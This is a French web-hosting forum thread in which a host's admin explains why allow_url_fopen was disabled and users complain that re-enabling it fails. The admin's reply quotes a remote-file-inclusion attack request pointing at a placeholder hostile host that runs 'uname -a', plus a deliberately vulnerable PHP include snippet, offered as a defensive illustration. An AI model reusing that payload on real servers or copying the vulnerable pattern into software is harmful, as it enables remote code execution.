Probleme fonction require_once et readfile

[Dalir]

depuis deux jours voilà le message d'erreur que j'obtient sur mon site, lors d'un parsage XML de donnée :

Warning: require_once() [function.require-once]: URL file-access is disabled in the server configuration in D:\www\lsdao.fr\htdocs\includes\fonction.php on line 329

Warning: require_once(http://flux.jeuxonline.info/actualites.php) [function.require-once]: failed to open stream: no suitable wrapper could be found in D:\www\lsdao.fr\htdocs\includes\fonction.php on line 329

voici le code de la fonction :

Code : Tout sélectionner

function rss(){ require_once('http://flux.jeuxonline.info/actualites.php'); foreach ($jol_actualites['items'] as $item) { if ($i <=9){ $i = $i+1; $flux = couper($item['title'],25); echo '<li class="stitre"><a target="_blank" href="' . $item['link'] . '">' . $flux . '</a></li>'; } } }

J'ai rien changer la configuration du serveur, et les urls sont valident.
Le fonction require_once() serait elle désactivés ?

site : http://www.lsdao.fr

[adminforum]

Nous avons désactiver en php allow_url_fopen ce quie cause cette erreure pour une raison de sécurité.


Détails:

orsque « allow_url_fopen » à est « On », pour toutes les commandes PHP ouvrant un fichier, si la chaine de caractère contenant le nom de fichier est de type "http://", PHP va récupérer le fichier à l'URL donnée et l'ouvrir.

Cela laisse possible une attaque de type « remote include », environs 70% des failles PHP utilise se principe.

Voici un exemple de ce type d'attaque dans les traces :

GET /claroline170/claroline/phpbb/page_tail.php?includePath= http://www.sitepirate.com/code_hostile. ... uname%20-a HTTP/1.0

Et voici le code vulnérable correspondant:

<?php # def des constantes $file = "toto.php"; #pour avoir un register global if (isset($HTTP_GET_VARS)) { while(list($var,$val)=each($HTTP_GET_VARS)) { $$var=$val;}} #include de la lib toto.php include ($file); ?>

Un appel du type : GET /index.php?file= ‘code_hostile.gif' aura comme conséquence d'exécuter du code PHP arbitraire sur le serveur.


SOLUTIONS :
Nous allons ajouter dans le LWS PANEL la possibilité de modifier cette directive de php mais uniquement pour les serveurs APACHE.

[Dalir]

SOLUTIONS :
Nous allons ajouter dans le LWS PANEL la possibilité de modifier cette directive de php mais uniquement pour les serveurs APACHE.

ok, cela fait deux jours que tout les matin je passe le paramètre :
« allow_url_fopen » à on via le panneau d'admin. J'attend gentiment 24H et le Phpinfo renvoit toujours "off". Lorsque je retourne dans le panneau d'admin, bah "allow_url_fopen" est off.....

site : www.lsdao.fr

[buzzetti]

SOLUTIONS :
Nous allons ajouter dans le LWS PANEL la possibilité de modifier cette directive de php mais uniquement pour les serveurs APACHE.

ok, cela fait deux jours que tout les matin je passe le paramètre :
« allow_url_fopen » à on via le panneau d'admin. J'attend gentiment 24H et le Phpinfo renvoit toujours "off". Lorsque je retourne dans le panneau d'admin, bah "allow_url_fopen" est off.....

site : www.lsdao.fr

pareil pour www.casual-suspects.com

[zab]

ok, cela fait deux jours que tout les matin je passe le paramètre :
« allow_url_fopen » à on via le panneau d'admin. J'attend gentiment 24H et le Phpinfo renvoit toujours "off". Lorsque je retourne dans le panneau d'admin, bah "allow_url_fopen" est off.....

pareil pour anna-tools.com, enfin pas tout à fait ca ne fait pas deux jours mais 4 (depuis vendredi)

ticket envoyé, plus que 72 heures à attendre